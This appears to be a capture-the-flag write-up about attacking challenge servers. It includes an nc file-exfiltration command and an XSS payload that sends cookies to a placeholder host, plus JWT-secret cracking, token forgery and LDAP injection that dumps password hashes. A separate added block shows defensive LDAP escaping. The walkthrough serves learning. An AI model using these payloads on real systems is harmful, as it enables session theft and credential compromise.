I wasn’t successful obtaining this file. I tried phishing Alabaster Snowball using the hints detailed above in the Mail Server Section. The hints for this one were given by Shinny Upatree. For whatever reason, I only got Alabaster Snowball to successfully connect to me once or twice, and the same payload would not work another time. I tried the proof of concept that Minty Candycane submitted. I tried turning it around and using the (New-Object System.Net.WebClient).UploadFile(). I tried running ping and capturing the traffic on my server to test connectivity. I tried using nc to send the file to myself as nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf. I tried nc x.x.x.x 6666 < C:\\GreatBookPage7.pdf thinking I might need to escape the < sign. I tried to offload the file onto the smb share owned by the elves or one of the other servers owned by the elves since I have access to them. I tried to offload the file to the l2s Server since I could break out of rbash on it. Found out the ip for the l2s server by doing:
/bin/netstat -n.
10.142.0.11
I put the listener in a hidden folder on the l2s server. (That could make things a bit easier for other players, if they found the hidden folder, if I was actually successful. :))
EDB Server
This one was vulnerable to XSS. The hints for this one were given by: Wunorse Openslae. I was having trouble with syntax on this one. The IP for this one was 10.142.0.6. I used ssh forwarding and set up a proxy on my browser. Navigating to 10.142.0.6, you see a login page. If you click on the Support link, you’re presented with a form to help get your login credentials if you’ve forgotten them. The message area is vulnerable to XSS. If you view the source of the page, at the bottom there is javascript that shows how the credential is stored. The credential is stored in local storage as np-auth. If you view the robots.txt page, you will see that the dev page is disallowed. This gives the LDAP information that is needed later to exploit this server.
I used the XSS filter evasion techniques denoted here until I found one that popped an alert box, then changed the payload:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
Here is the XSS that I used:
<IMG SRC=# onerror=window.open("http://x.x.x.x/cookiecatcher.php?cookie="+document.cookie)>
It just plain looks weird, but I’m not awesome with javascript. I found it after playing around with the syntax a bit.
On my server, I had a php program that I found that logs the cookie, found here: https://breakthesecurity.cysecurity.org/2011/09/how-to-create-cookie-stealer-coding-in-php-get-via-email.html
I served it using the built-in development web server in php:
sudo php -S 0.0.0.0:80
Then I decoded the np-auth token using py-jwt. I didn’t need a secret to decode it. I tried changing the expiration on that token, but I didn’t have the secret to successfully forge a new token.
I didn’t know that I had to crack the secret until a friend gave me a pointer.
I used jwtcrack to crack it and got the secret “3lv3s”.
I used the secret to forge a token with py-jwt.
I changed the local storage to hold a token named np-auth, with the value of the newly forged key.
I just got into the edb/ldap server the night that the challenge is due, so I didn't finish getting that flag. Hints give away what it is vulnerable to. Also, I knew what the other servers were vulnerable to, and nmap says this is running ldap, hence the reason I know it's the ldap one.
If you look at robots.txt, you see that the /dev folder is supposed to be disallowed in the search results. Looking at the dev folder, you see this:
Update: Well, that didn't take long. I'm holding off on reading write-ups until I solve these. It paid off. I returned all the records from reading this post on the SANS Pen Testing blog.
https://pen-testing.sans.org/blog/2017/11/27/understanding-and-exploiting-web-based-ldap
Getting past this was annoying until I figured out what to do.
So basically what happens is that the radio button on the web page sets the form variable isElf to true when checked and false otherwise. Server-side, if isElf from the request form is not equal to true, the ou is reindeer; if isElf from the request form is equal to true, the ou is elf. These represent the ou (organizational unit) in LDAP. So I ran this query and it returned Rudolph. At first I wondered how it returned Rudolph; look about two sentences back: if isElf is false, then ou = reindeer. That is how Rudolph was returned. Duh to me. Then I noticed the scrollbar at the bottom.
So how did everyone else's records get returned? I honestly have no idea how this worked; I will have to study it more. But I changed the attributes as described in the article, like so:
It returned everyone's password hashes as well. Nice!
Either crack it or try Google, because it's an MD5 hash.
Log out and attempt to log in as Santa Claus...
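As an added example, not the author's code and not the EDB server's, here is the defender's view of the LDAP section above: a filter built by string concatenation beside the same filter with RFC 4515 escaping, the ou derived server-side from the isElf radio button as the post describes, and a server-side allow-list of returned attributes so that userPassword hashes never leave the directory however the HTML is changed. The filter shape, attribute names and function names are assumptions, since the post does not show the EDB server's actual query.

```python
# Hypothetical filter shape and attribute names; the post does not show the real query.
_LDAP_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\0": r"\00"}
# Attributes the search page legitimately needs; userPassword is deliberately absent.
ALLOWED_ATTRIBUTES = ("cn", "ou", "mail", "telephoneNumber")


def ou_for(is_elf_param: str) -> str:
    """Derive the organizational unit on the server from the radio button, as the post describes."""
    return "elf" if is_elf_param == "true" else "reindeer"


def ldap_escape(value: str) -> str:
    """RFC 4515 escaping of the characters that carry meaning inside a search filter."""
    return "".join(_LDAP_ESCAPES.get(ch, ch) for ch in value)


def build_filter_unsafe(name: str, is_elf_param: str) -> str:
    """String concatenation: a name containing ')(' rewrites the filter's structure."""
    return f"(&(ou={ou_for(is_elf_param)})(cn={name}))"


def build_filter_safe(name: str, is_elf_param: str) -> str:
    """Same filter, but the user-supplied value can only ever be matched, never parsed."""
    return f"(&(ou={ou_for(is_elf_param)})(cn={ldap_escape(name)}))"


def select_attributes(requested) -> list:
    """Server-side allow-list: ignore any attribute the client asks for that is not approved."""
    return [a for a in requested if a in ALLOWED_ATTRIBUTES]
```

A search that uses build_filter_safe and select_attributes keeps the radio button's ou choice intact and cannot be widened to other ous, wildcards or password attributes by editing the form.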
NPPD Server
We weren’t allowed to attack this one, but we could use it to get more information than was intended.
The people on the naughty and nice list could be compared to the infractions in the database, which can then be used to determine how many infractions it takes to be placed on the naughty list. It could potentially be used to see who the moles are as well.
[Screenshots from the original post, captions only: Alabaster Snowball's JWT Token; Blank Key; Alabaster's decoded JWT Token; Alabaster's Cracked JWT Secret; Forged Alabaster's JWT Token; Changing Local Storage np-auth; EDB Server: Dev Listing; LDAP LDIF Template; EDB Find Elves Source Code; Returning Everyone's Records; Changing HTML to get Password Hashes; Santa's Password Hash; Santa's Cracked Password; Entering Password for Santa Panel; Letter From The Wizard]